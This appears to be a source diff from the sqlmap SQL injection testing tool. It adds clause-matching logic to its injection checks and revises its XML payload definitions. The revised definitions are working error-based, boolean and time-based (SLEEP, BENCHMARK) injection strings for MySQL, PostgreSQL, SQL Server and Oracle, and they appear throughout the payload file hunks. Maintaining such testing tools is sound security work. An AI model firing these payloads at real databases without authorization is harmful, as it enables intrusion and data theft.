diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 22a8589a7..462c16d78 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -94,6 +94,7 @@ def checkSqlInjection(place, parameter, value): for test in conf.tests: title = test.title stype = test.stype + clause = test.clause # Skip test if the risk is higher than the provided (or default) # value @@ -145,6 +146,22 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue + # Skip test if it does not match the same SQL injection clause + # already identified by another test + # Parse test's + clauseMatch = False + + for clauseTest in clause: + if injection.clause is not None and clauseTest in injection.clause: + clauseMatch = True + break + + if clause != [ 0 ] and injection.clause and not clauseMatch: + debugMsg = "skipping test '%s' because the clause " % title + debugMsg += "differs from the clause already identified" + logger.debug(debugMsg) + continue + infoMsg = "testing '%s'" % title logger.info(infoMsg) @@ -340,6 +357,7 @@ def checkSqlInjection(place, parameter, value): injection.ptype = ptype injection.prefix = prefix injection.suffix = suffix + injection.clause = clause if "epayload" in test: epayload = "%s%s" % (test.epayload, comment) diff --git a/lib/core/datatype.py b/lib/core/datatype.py index 101b6315f..97b748b43 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -70,6 +70,7 @@ def injectionDict(): injection.ptype = None injection.prefix = None injection.suffix = None + injection.clause = None # data is a dict with stype as key and a tuple as value with # title, where, comment and reqPayload diff --git a/xml/payloads.xml b/xml/payloads.xml index 749950b56..bb30133e9 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -393,16 +393,6 @@ Formats: - - - 2 - 2,3 - 1,2 - 1 - , - - - @@ -604,16 +594,6 @@ Formats: -- - - - 2 - 2,3 - 1,2 - 1 - , - - -- - @@ -662,10 +642,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))
MySQL @@ -682,10 +662,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL @@ -701,10 +681,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server @@ -720,10 +700,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)
Oracle @@ -741,10 +721,10 @@ Formats: 1 - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) @@ -1046,15 +1026,15 @@ Formats: - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (append) 2 3 0 2,3 1 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1066,15 +1046,15 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses + PostgreSQL error-based - GROUP BY and ORDER BY clauses (append) 2 3 0 2,3 1 - (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) - (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1085,15 +1065,15 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause + Microsoft SQL Server/Sybase error-based - ORDER BY clause (append) 2 3 0 3 1 - (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) - (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1104,15 +1084,15 @@ Formats: - Oracle error-based - ORDER BY clause + Oracle error-based - ORDER BY clause (append) 2 3 0 3 1 - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] @@ -1123,7 +1103,7 @@ Formats: - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses + MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses (replace) 2 4 0 @@ -1143,7 +1123,7 @@ Formats: - PostgreSQL error-based - GROUP BY and ORDER BY clauses + PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace) 2 4 0 @@ -1162,7 +1142,7 @@ Formats: - Microsoft SQL Server/Sybase error-based - ORDER BY clause + Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace) 2 4 0 @@ -1181,7 +1161,7 @@ Formats: - Oracle error-based - ORDER BY clause + Oracle error-based - ORDER BY clause (replace) 2 4 0 @@ -1437,7 +1417,7 @@ Formats: 5 1 1 - 1 + 1,2,3 1 AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) @@ -1457,7 +1437,7 @@ Formats: 5 2 1 - 1 + 1,2,3 1 AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) @@ -1525,7 +1505,7 @@ Formats: 5 2 3 - 1 + 1,2,3 1 OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) @@ -1545,7 +1525,7 @@ Formats: 5 3 3 - 1 + 1,2,3 1 OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))